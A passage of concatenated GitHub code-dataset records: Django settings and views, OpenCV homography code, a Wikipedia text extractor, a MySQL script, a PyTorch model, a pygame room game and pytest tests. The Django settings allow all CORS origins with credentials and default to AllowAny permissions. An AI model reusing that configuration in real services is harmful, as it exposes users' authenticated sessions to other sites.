'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'main_api.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'main_api.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/2.2/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.2/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Asia/Kolkata'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSTATIC_ROOT = 'staticfiles'\nSTATICFILES_DIRS = (\nos.path.join(BASE_DIR, 'static',),)\nSTATIC_URL = '/static/'\n\n# Default primary key field type\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '/media/'\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\nACCOUNT_EMAIL_VERIFICATION = 'none'\nSITE_ID = 1\nLOGIN_URL = 'account_login'\nACCOUNT_EMAIL_REQUIRED=True\nACCOUNT_EMAIL_VERIFICATION = \"optional\"\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_USERNAME_REQUIRED = False\nACCOUNT_UNIQUE_EMAIL = True\n\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n \"django.contrib.auth.backends.ModelBackend\",\n\n # `allauth` specific authentication methods, such as login by e-mail\n \"allauth.account.auth_backends.AuthenticationBackend\",\n)\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.AllowAny',\n ),\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n ),\n}\n\n# REST_AUTH_SERIALIZERS = {\n# 'LOGIN_SERIALIZER': 'core.serializers.LoginUserSerializer',\n# }\n\nCORS_ORIGIN_ALLOW_ALL = True\nCORS_ALLOW_CREDENTIALS = True\nCSRF_COOKIE_SECURE = True\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SAMESITE = 'None'\nSESSION_COOKIE_SAMESITE = 'None'\n\n# django Email\n# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n# EMAIL_HOST = 'smtp.gmail.com'\n# EMAIL_USE_TLS = True\n# EMAIL_PORT = 587\n# EMAIL_HOST_USER = get_secret('EMAIL_HOST_USER')\n# EMAIL_HOST_PASSWORD = get_secret('EMAIL_HOST_PASSWORD')\n# DEFAULT_FROM_EMAIL = EMAIL_HOST_USER\n\n\n\n\n# AWS_ACCESS_KEY_ID = get_secret('AWS_ACCESS_KEY_ID')\n# AWS_SECRET_ACCESS_KEY = get_secret('AWS_SECRET_ACCESS_KEY')\n# AWS_STORAGE_BUCKET_NAME = get_secret('AWS_STORAGE_BUCKET_NAME')\n# AWS_S3_FILE_OVERWRITE = False\n# AWS_DEFAULT_ACL = None\n# AWS_S3_REGION_NAME = 'ap-south-1'\n# AWS_S3_SIGNATURE_VERSION = get_secret('AWS_S3_SIGNATURE_VERSION')\n# DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'", "repo_name": "PKSingh0017/api-fest-2022", "sub_path": "main_api/settings.py", "file_name": "settings.py", "file_ext": "py", "file_size_in_byte": 5097, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 9, "usage_type": "call"}, {"api_name": "django.core.exceptions.ImproperlyConfigured", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}]} +{"seq_id": "1388926215", "text": "from django.urls import path\nfrom .views import home,insert_emp,display_all,update_emp,delete_emp\nurlpatterns = [\n path('',home,name=\"home\"),\n path('insert/',insert_emp,name=\"create\"),\n path('displayall/',display_all,name=\"retrieve_all\"),\n path('update//',update_emp,name=\"update\"),\n path('delete//',delete_emp,name=\"delete\"),\n\n\n]", "repo_name": "vedasaipriya/django_Session3_CRUD", "sub_path": "database/crud/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 361, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 4, "usage_type": "call"}, {"api_name": "views.home", "line_number": 4, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "views.insert_emp", "line_number": 5, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "views.display_all", "line_number": 6, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.update_emp", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.delete_emp", "line_number": 8, "usage_type": "argument"}]} +{"seq_id": "29822640646", "text": "import numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\n\ndef findTranform(sourceImage):\n MIN_MATCH_COUNT = 10\n\n #sourceImage = captureImage.captureFrame()\n queryImage = cv.cvtColor(sourceImage, cv.COLOR_BGR2GRAY)\n refImage = cv.imread('img/kimble_ref_800.jpg',0) # trainImage\n\n cv.normalize(sourceImage, sourceImage, 0, 255, cv.NORM_MINMAX)\n cv.normalize(queryImage, queryImage, 0, 255, cv.NORM_MINMAX)\n\n # Initiate SIFT detector\n sift = cv.xfeatures2d.SIFT_create()\n\n # find the keypoints and descriptors with SIFT\n kp1, des1 = sift.detectAndCompute(queryImage,None)\n kp2, des2 = sift.detectAndCompute(refImage,None)\n\n FLANN_INDEX_KDTREE = 0\n index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n search_params = dict(checks = 50)\n\n flann = cv.FlannBasedMatcher(index_params, search_params)\n\n matches = flann.knnMatch(des1,des2,k=2)\n\n # store all the good matches as per Lowe's ratio test.\n good = []\n for m,n in matches:\n if m.distance < 0.7*n.distance:\n good.append(m)\n\n if len(good)>MIN_MATCH_COUNT:\n src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)\n dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n M, mask = cv.findHomography(src_pts, dst_pts, cv.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\n h,w = queryImage.shape\n pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n dst = cv.perspectiveTransform(pts,M)\n\n refImage = cv.polylines(refImage,[np.int32(dst)],True,255,3, cv.LINE_AA)\n\n else:\n print(\"Not enough matches are found - %d/%d\") % (len(good),MIN_MATCH_COUNT)\n matchesMask = None\n \n #draw_params = dict(matchColor = (0,255,0), # draw matches in green color\n # singlePointColor = None,\n # matchesMask = matchesMask, # draw only inliers\n # flags = 2)\n\n #img3 = cv.drawMatches(queryImage,kp1,refImage,kp2,good,None,**draw_params)\n\n #plt.imshow(img3, 'gray'),plt.show()\n \n #sourceImage = cv.warpPerspective(sourceImage, M, refImage.shape)\n #print(M)\n #cv.imshow(\"final\", sourceImage)\n #cv.waitKey(0)\n\n return M\n\n", "repo_name": "viljamip/kimble-die-detector", "sub_path": "findPerspective.py", "file_name": "findPerspective.py", "file_ext": "py", "file_size_in_byte": 2329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.cvtColor", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.normalize", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.NORM_MINMAX", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.xfeatures2d.SIFT_create", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.xfeatures2d", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.FlannBasedMatcher", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.findHomography", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.RANSAC", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.perspectiveTransform", "line_number": 45, "usage_type": "call"}, {"api_name": "cv2.polylines", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 47, "usage_type": "attribute"}]} +{"seq_id": "5503348637", "text": "from django.shortcuts import render\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom django.views.generic import CreateView\n\nsign_up = CreateView.as_view(\n form_class=UserCreationForm,\n # template_name=\"accounts/sign_up_form.html\",\n template_name=\"form.html\",\n success_url=settings.LOGIN_URL,\n)\n\nsign_in = LoginView.as_view(\n template_name = \"form.html\",\n)\n\nsign_out = LogoutView.as_view(\n next_page = settings.LOGIN_URL,\n)\n\n\n# def sign_up(request):\n# pass\n\n# def sign_in(request):\n# pass\n\n# def sign_out(request):\n# pass\n\n@login_required\ndef profile(request):\n return render(request, \"accounts/profile.html\")", "repo_name": "raoner/code-lion", "sub_path": "18_220705_DJANGO06/my_youtube/accounts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 804, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.views.generic.CreateView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.contrib.auth.forms.UserCreationForm", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.settings.LOGIN_URL", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.auth.views.LoginView.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.settings.LOGIN_URL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "34573530169", "text": "import os\nimport argparse\nimport json\nimport nltk\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--folder\",\n type=str,\n required=True,\n help=\"(str) the absolute path to the folder containing the folders of wikipedia jsons\")\n parser.add_argument(\"--write_file\",\n required=True,\n help=\"(str) path and filename to the txt file where wikipedia is going to be written to\")\n args = parser.parse_args()\n if args.folder[-1]!=\"/\":\n args.folder= args.folder+\"/\"\n\n write_file = open(args.write_file,\"w\")\n\n for folder in os.listdir(args.folder):\n for open_file_name in os.listdir(args.folder+folder+\"/\"):\n\n print(open_file_name)\n with open(args.folder+folder+\"/\"+open_file_name, \"r\") as open_file:\n for article in open_file:\n json_obj = json.loads(article)\n text = json_obj[\"text\"]\n\n #removes title from text, which occurs before first line break\n dex=0\n while text[dex:dex+1]!=\"\\n\":\n dex+=1\n text = text[dex+1:]\n\n #removes all new lines\n text = text.replace(\"\\n\",\" \")\n\n sentences = nltk.tokenize.sent_tokenize(text)\n for sentence in sentences:\n write_file.write(sentence+\"\\n\")\n\n write_file.write(\"\\n\")\n\n\n write_file.close()\n\nif __name__==\"__main__\":\n main()\n", "repo_name": "saurabhkulkarni77/DistillBERT", "sub_path": "extract_wikipedia_for_bert/extract_jsons.py", "file_name": "extract_jsons.py", "file_ext": "py", "file_size_in_byte": 1619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 60, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 27, "usage_type": "call"}, {"api_name": "nltk.tokenize.sent_tokenize", "line_number": 39, "usage_type": "call"}, {"api_name": "nltk.tokenize", "line_number": 39, "usage_type": "attribute"}]} +{"seq_id": "11729724676", "text": "#!/usr/bin/python3\n'''script that lists all cities from the database hbtn_0e_4_usa'''\nimport MySQLdb\nimport sys\n\n\nif __name__ == '__main__':\n db_connection = MySQLdb.connect(\n host='localhost',\n user=sys.argv[1],\n password=sys.argv[2],\n database=sys.argv[3],\n port=3306)\n cursor = db_connection.cursor()\n cursor.execute(\n \"SELECT cities.name\\\n FROM cities\\\n INNER JOIN states\\\n ON cities.state_id = states.id\\\n WHERE states.name = %s\\\n ORDER BY cities.id\", (sys.argv[4], ))\n esp = \"\"\n for row in cursor.fetchall():\n print(f\"{esp}{row[0]}\", end=\"\")\n esp = \", \"\n print()\n cursor.close()\n db_connection.close()\n", "repo_name": "vsroyvs/holbertonschool-higher_level_programming", "sub_path": "python-object_relational_mapping/5-filter_cities.py", "file_name": "5-filter_cities.py", "file_ext": "py", "file_size_in_byte": 767, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "MySQLdb.connect", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "73537115684", "text": "import torch\nimport torch.nn as nn\n\nfrom oscillate.model.model.decoder import Decoder\nfrom oscillate.model.model.encoder import Encoder\n\n\nclass TTAModel(nn.Module):\n\n\tdef __init__(self, encoder: Encoder, decoder: Decoder, *args, decoder_vocab_size=1024, dtype=torch.float32, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.encoder = encoder\n\t\tself.decoder = decoder\n\t\tself.enc_reshape = nn.Linear(self.encoder.emb_size, self.decoder.emb_size, dtype=dtype)\n\t\tself.dec_reshape = nn.Linear(self.decoder.emb_size, decoder_vocab_size * self.decoder.input_emb_size, dtype=dtype)\n\t\tself.softmax = nn.Softmax(-1)\n\t\tself.decoder_vocab_size = decoder_vocab_size\n\n\tdef forward(self, X_encoder, X_decoder):\n\t\ty_encoder, pad_mask = self.encoder(X_encoder)\n\t\ty_encoder = self.enc_reshape(y_encoder)\n\t\ty_decoder = self.decoder(X_decoder, y_encoder, pad_mask)\n\t\ty_decoder = y_decoder[:, -1]\n\t\ty = self.dec_reshape(y_decoder)\n\t\ty = y.reshape((X_decoder.shape[0], self.decoder.input_emb_size, self.decoder_vocab_size))\n\t\ty = self.softmax(y)\n\t\treturn y\n", "repo_name": "abreham-atlaw/oscillate", "sub_path": "src/python/oscillate/model/model/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1040, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "oscillate.model.model.encoder.Encoder", "line_number": 10, "usage_type": "name"}, {"api_name": "oscillate.model.model.decoder.Decoder", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.float32", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "7780882778", "text": "import pygame\nfrom Itens.Itens import KeyItem\nfrom Salas.Room import Room\nfrom Itens.Arrows import BackArrow,UpArrow,DiagonalArrow\n\nclass Quarto(Room):\n def __init__(self,map):\n super().__init__()\n self.room_name = \"Quarto\"\n self.image = \"graphics/Cenario 1/Quarto_gaveta_fechada.png\"\n self.exits = [\"Up\",\"Back\"]\n self.exitsName = [\"QuartoPorta\"]\n self.map = map\n \n self.arrows = [BackArrow((420,450))]\n \n self.gaveta = QuartoGaveta(self)\n self.quartoPorta = QuartoPorta(self)\n self.quartoTeto = QuartoTeto(self)\n\n self.interactives = {\"cama\": pygame.Rect((505,230),(349,250)), \n \"armario\": pygame.Rect((78,46),(251,417)),\n \"comoda\": pygame.Rect((355,327),(129,136))}\n\n self.id = \"Quarto\"\n\n self.tutorial_phase = 0\n\n \n\n \n\n \n def backLocation(self):\n return self.quartoPorta\n def upLocation(self):\n # if not(\"comoda\" in self.interactives):\n # self.addRect(pygame.Rect((355,327),(129,136)), \"comoda\")\n return self.quartoTeto\n\n\n def ineractRect(self,rect,player):\n super().ineractRect(rect,player)\n \n\n if rect == self.interactives[\"comoda\"]: # Cômoda do quarto\n \n if not self.quartoTeto.firstTime:\n player.change_room(self.gaveta, sound = \"None\")\n self.image = \"graphics/Cenario 1/Quarto_gaveta_aberta.png\"\n self.quartoTeto.image = \"graphics/Cenario 1/Teto_gaveta_aberta.png\"\n \n if not self.quartoTeto.gaveta_open:\n self.quartoTeto.gaveta_open = True\n pygame.mixer.Sound(\"audio/Sound Effects/gaveta_abrindo.mp3\").play()\n else:\n player.dialog_manager.set_dialog(\"interacao_comoda\")\n\n if rect == self.interactives[\"cama\"]:\n player.dialog_manager.set_dialog(\"interacao_cama\")\n\n if rect == self.interactives[\"armario\"]:\n player.dialog_manager.set_dialog(\"interacao_armario\")\n\n def update(self, screen):\n \n if self.tutorial_phase == 0:\n self.map.player.dialog_manager.set_dialog(\"tutorial_dialog_0\", color = (102, 250, 245))\n self.tutorial_phase = 1\n return super().update(screen)\n\n\nclass QuartoGaveta(Room):\n def __init__(self,quarto):\n super().__init__()\n self.room_name = \"QuartoGaveta\"\n self.exits = [\"Back\"]\n self.arrows = [BackArrow((42,385))]\n self.quarto = quarto\n self.image = \"graphics/Cenario 1/gaveta_gancho.png\"\n self.gancho_breakable = False\n self.gancho = True\n \n self.interactives = {\"gancho\": pygame.Rect((510,157),(147,69))}\n \n \n\n def backLocation(self):\n return self.quarto\n\n\n def ineractRect(self,rect,player):\n super().ineractRect(rect,player)\n if rect == self.interactives[\"gancho\"]: # Porta\n if self.gancho_breakable and self.gancho:\n self.gancho = False\n self.image = \"graphics/Cenario 1/gaveta.png\"\n self.quarto.quartoTeto.image = \"graphics/Cenario 1/Teto_gaveta.png\"\n chave = KeyItem(dialog = \"item_tutorial\", dialog_color = (102, 250, 245));\n chave.rect.x = 400\n chave.rect.y = 318\n self.quarto.itens.append(chave)\n pygame.mixer.Sound(\"audio/Sound Effects/key_dropping.mp3\").play()\n \n \n elif self.gancho:\n player.dialog_manager.set_dialog(\"interacao_gancho\")\n \n \n \n\n \nclass QuartoPorta(Room):\n def __init__(self,quarto):\n super().__init__()\n self.room_name = \"QuartoPorta\"\n self.exits = [\"Back\",\"Up\"]\n self.image = \"graphics/Cenario 1/Quarto_porta_fechada.png\"\n self.arrows = [BackArrow((486,431))]\n self.quarto = quarto\n self.door_status = False\n\n\n porta_rect = pygame.Rect((409,103),(165,314))\n self.interactives[\"porta\"] = porta_rect\n \n def backLocation(self):\n return self.quarto\n\n def ineractRect(self,rect,player):\n super().ineractRect(rect,player)\n if rect == self.interactives[\"porta\"]: # Porta\n if not self.door_status:\n player.dialog_manager.set_dialog(\"interacao_porta\")\n if len(self.quarto.arrows) < 2:\n self.quarto.arrows.append(UpArrow((420,100), sound = \"None\"))\n else:\n player.change_room(self.quarto.RoomExitClassFromMap(self.quarto.map,self.quarto.exitsName[0]))\n \n def update(self, screen):\n \n if self.quarto.tutorial_phase == 1:\n self.quarto.map.player.dialog_manager.set_dialog(\"tutorial_dialog_1\", color = (102, 250, 245))\n self.quarto.tutorial_phase = 2\n return super().update(screen)\n\n def useItem(self, rect, player):\n itemHolding = player.itemHolding.sprites()[0]\n if rect in [interactives for interactives in self.interactives.values()]:\n if rect == self.interactives[\"porta\"] and itemHolding.type == KeyItem().type:\n print(\"abriu\")\n player.inventory.remove(itemHolding)\n self.door_status = True\n pygame.mixer.Sound(\"audio/Sound Effects/open_door.mp3\").play()\n self.image = \"graphics/Cenario 1/Quarto_porta_aberta.png\"\n\n\nclass QuartoTeto(Room):\n def __init__(self,quarto):\n super().__init__()\n self.room_name = \"QuartoTeto\"\n self.exits = [\"Back\"]\n self.arrows = [DiagonalArrow( (127,425), -90, sound = \"None\")]\n self.image = \"graphics/Cenario 1/Teto_gaveta_fechada.png\"\n self.quarto = quarto\n self.firstTime = True\n self.gaveta_open = False\n \n self.interactives = {\"gaveta\": pygame.Rect((411,29),(112,120))}\n\n def backLocation(self):\n return self.quarto\n\n def update(self, screen):\n \n if self.firstTime:\n self.quarto.map.player.dialog_manager.set_dialog(\"FirstTime_QuartoTeto\")\n self.firstTime = False\n \n elif self.quarto.tutorial_phase == 2:\n self.quarto.map.player.dialog_manager.set_dialog(\"FirstTime_QuartoTeto\")\n self.quarto.tutorial_phase = 3\n return super().update(screen)\n\n def ineractRect(self,rect,player):\n super().ineractRect(rect,player)\n if rect == self.interactives[\"gaveta\"] and self.gaveta_open and self.quarto.gaveta.gancho: \n self.quarto.map.player.dialog_manager.set_dialog(\"interacao_gaveta\")\n self.quarto.gaveta.gancho_breakable = True\n", "repo_name": "Endobear/SMAUG-2", "sub_path": "Salas/Quarto.py", "file_name": "Quarto.py", "file_ext": "py", "file_size_in_byte": 6768, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Salas.Room.Room", "line_number": 6, "usage_type": "name"}, {"api_name": "Itens.Arrows.BackArrow", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.mixer.Sound", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 55, "usage_type": "attribute"}, {"api_name": "Salas.Room.Room", "line_number": 73, "usage_type": "name"}, {"api_name": "Itens.Arrows.BackArrow", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 84, "usage_type": "call"}, {"api_name": "Itens.Itens.KeyItem", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.mixer.Sound", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 103, "usage_type": "attribute"}, {"api_name": "Salas.Room.Room", "line_number": 113, "usage_type": "name"}, {"api_name": "Itens.Arrows.BackArrow", "line_number": 119, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 124, "usage_type": "call"}, {"api_name": "Itens.Arrows.UpArrow", "line_number": 136, "usage_type": "call"}, {"api_name": "Itens.Itens.KeyItem", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.mixer.Sound", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 154, "usage_type": "attribute"}, {"api_name": "Salas.Room.Room", "line_number": 158, "usage_type": "name"}, {"api_name": "Itens.Arrows.DiagonalArrow", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 169, "usage_type": "call"}]} +{"seq_id": "41779136422", "text": "import pytest\nfrom src.evaluate import AnchorResults, EAO_Rank\n\n\ndef test_iou():\n n_misses_allowed = 10\n iou_threshold = 0.1\n err_3d_threshold = 1000\n ar = AnchorResults(n_misses_allowed, iou_threshold, err_3d_threshold)\n # Empty intersection\n bbox_gt = (0, 0, 2, 2)\n bbox_p = (5, 5, 2, 2)\n assert(ar.get_iou(bbox_gt, bbox_p) == 0.0)\n bbox_gt = (0, 0, 2, 2)\n bbox_p = (2, 2, 2, 2)\n assert(ar.get_iou(bbox_gt, bbox_p) == 0.0)\n # Full intersection\n bbox_gt = (0, 0, 2, 2)\n bbox_p = (0, 0, 2, 2)\n assert(ar.get_iou(bbox_gt, bbox_p) == 1.0)\n bbox_gt = (5, 5, 10, 10)\n bbox_p = (5, 5, 10, 10)\n assert(ar.get_iou(bbox_gt, bbox_p) == 1.0)\n # Partial intersection\n bbox_gt = (0, 0, 2, 2)\n bbox_p = (1, 1, 2, 2)\n assert(ar.get_iou(bbox_gt, bbox_p) == pytest.approx(0.142, 0.01))\n bbox_gt = (0, 0, 2, 2)\n bbox_p = (1, 0, 2, 2)\n assert(ar.get_iou(bbox_gt, bbox_p) == pytest.approx(0.333, 0.01))\n\n\ndef test_robustness():\n n_misses_allowed = 10\n iou_threshold = 0.1\n err_3d_threshold = 1000\n ar = AnchorResults(n_misses_allowed, iou_threshold, err_3d_threshold)\n ar.robustness_frames_counter = 25\n ar.n_visible_and_not_diff = 40\n ar.n_excessive_frames = 10\n rob = ar.get_robustness_score(25)\n assert(rob == 0.5) # 25 / (40 + 10)\n\n\ndef test_accuracy():\n n_misses_allowed = 10\n iou_threshold = 0.1\n err_3d_threshold = 1000\n ar = AnchorResults(n_misses_allowed, iou_threshold, err_3d_threshold)\n ar.iou_list = [1.0, 1.0, 0.5, 0.5]\n ar.n_visible_and_not_diff = 4\n acc = ar.get_accuracy_score()\n assert(acc == 0.75)\n\n\ndef test_EAO_Rank():\n # Empty sequence\n ss_list = []\n rank = EAO_Rank(0, 0)\n eao = rank.calculate_eao_score()\n assert(eao == 0.0)\n # Single sequence\n ss_list = [[1., 1., 1.]]\n rank = EAO_Rank(0, len(ss_list[0]))\n rank.final_ss = ss_list\n rank.all_ss_len_max = len(ss_list[0])\n eao = rank.calculate_eao_score()\n assert(eao == 1.0)\n ss_list = [[1., \"ignore\", 1.]]\n rank = EAO_Rank(0, len(ss_list[0]))\n rank.final_ss = ss_list\n rank.all_ss_len_max = len(ss_list[0])\n eao = rank.calculate_eao_score()\n assert(eao == 1.0)\n # Multiple sequences\n ss_list = [[1.],\n [0.]]\n rank = EAO_Rank(0, len(ss_list[0]))\n rank.final_ss = ss_list\n rank.all_ss_len_max = 1\n eao = rank.calculate_eao_score()\n assert(eao == 0.5)\n ss_list = [[\"ignore\"],\n [0.7215]]\n rank = EAO_Rank(0, len(ss_list[0]))\n rank.final_ss = ss_list\n rank.all_ss_len_max = 1\n eao = rank.calculate_eao_score()\n assert(eao == 0.7215)\n ss_list = [[1.0],\n [0.75],\n [0.5],\n [0.25],\n [0.0]]\n rank = EAO_Rank(0, len(ss_list[0]))\n rank.final_ss = ss_list\n rank.all_ss_len_max = 1\n eao = rank.calculate_eao_score()\n assert(eao == 0.5)\n # Test curve\n ss_list = [[0.3605, 0.5, \"ignore\", 0.],\n [0.0000, 0.0, 0., 0.7215]]\n rank = EAO_Rank(0, len(ss_list[0]))\n eao_curve = rank.calculate_eao_curve(ss_list, len(ss_list[0]))\n assert(eao_curve[0] == 0.18025)\n assert(eao_curve[1] == 0.25)\n assert(eao_curve[2] == 0.0)\n assert(eao_curve[3] == 0.36075)\n", "repo_name": "leopoldmueller/surg_tracking", "sub_path": "tests/test_evaluate.py", "file_name": "test_evaluate.py", "file_ext": "py", "file_size_in_byte": 3252, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 